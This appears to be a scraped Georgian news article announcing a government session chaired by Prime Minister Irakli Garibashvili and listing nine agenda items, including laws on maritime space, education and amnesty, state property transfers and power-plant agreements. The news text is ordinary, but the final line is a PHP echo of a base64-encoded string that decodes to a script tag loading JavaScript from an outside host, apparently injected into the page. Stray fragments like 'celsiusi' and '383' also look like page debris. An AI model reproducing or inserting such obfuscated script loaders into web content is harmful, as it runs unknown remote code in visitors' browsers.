celsiusi
ავერსი საქკაბელი

საქართველოს მთავრობის ადმინისტრაციაში დღეს, 14 საათზე მთავრობის სხდომა გაიმართება, რომელსაც პრემიერ-მინისტრი ირაკლი ღარიბაშვილი უხელმძღვანელებს. 

მთავრობის ადმინისტრაციის მიერ გავრცელებული ინფორმაციით, მინისტრთა კაბინეტი დღის წესრიგით გათვალისწინებულ 9 საკითხს განიხილავს, რომელთა უმრავლესობას 6 საკითხს ეკონომიკის მინისტრი ლევან დავითაშვილი წარადგენს.

განსახილველ საკითხებს შორის კი არის:

1. საქართველოს კანონის პროექტი „საქართველოს საზღვაო სივრცის შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“, მომხსენებელი: ლ. დავითაშვილი

2. საქართველოს კანონების პროექტი „ზოგადი განათლების შესახებ“ საქართველოს კანონში ცვლილების შეტანის თაობაზე“, მომხსენებელი: განათლების მინისტრი გ. ამილახვარი

3.  საქართველოს კანონის პროექტი "ამნისტიის შესახებ“, მომხსენებელი: საქართველოს მთავრობის ადმინისტრაციის უფროსი რევაზ ჯაველიძე;

4. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ლგ ტრანსისათვის“ აღნაგობის უფლებით გადაცემაზე თანხმობის მიცემის შესახებ“ საქართველოს მთავრობის 2022 წლის 14 ივნისის N1075 განკარგულებაში ცვლილების შეტანის შესახებ“, მომხსენებელი: ეკონომიკის სამინისტრო ლევან დავითაშვილი

5. საქართველოს მთავრობის განკარგულების პროექტი "სახელმწიფო საკუთრებაში არსებული უძრავი ნივთების ფ/პ მიხეილ ჩომახაშვილისათვის პირდაპირი მიყიდვის ფორმით პრივატიზებისა და იჯარის უფლებით გადაცემაზე თანხმობის მიცემის შესახებ“, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

6. საქართველოს მთავრობის განკარგულების პროექტი "საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს სისტემაში შემავალი სსიპ - სახელმწიფო ქონების ეროვნული სააგენტოსათვის უძრავი ნივთების გაცვლაზე თანხმობის მიცემის თაობაზე”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი; 

7. საქართველოს მთავრობის განკარგულების პროექტი "საქართველოს მთავრობას, სს „ელექტროენგეტიკული სისტემის კომერციულ ოპერატორსა“ და შპს "სი-სი-ი-ეიჩ ჰაიდრო VI"-ს შორის „ბახვი 1 ჰესის“ ჰიდროელექტროსადგურის განხორციელების ხელშეკრულების მოწონების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

8. საქართველოს მთავრობის განკარგულების პროექტი "საქართველოს მთავრობას და შპს „ალაზნის მზეს“ შორის „ქედის მზის ელექტროსადგურის" შესახებ განსახორციელებელი ღონისძიებების შესახებ”, მომხსენებელი: ეკონომიკის მინისტრი ლევან დავითაშვილი;

9. საქართველოს მთავრობის დადგენილების პროექტი „იმ ქვეყნების ჩამონათვალის დამტკიცების შესახებ, რომელთა მოქალაქეებსაც შეუძლიათ საქართველოში უვიზოდ შემოსვლა“ საქართველოს მთავრობის 2015 წლის 5 ივნისის N255 დადგენილებაში ცვლილების შეტანის თაობაზე“, მომხსენებელი: საგარეო საქმეთა მინისტრი ილია დარჩიაშვილი 

383
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");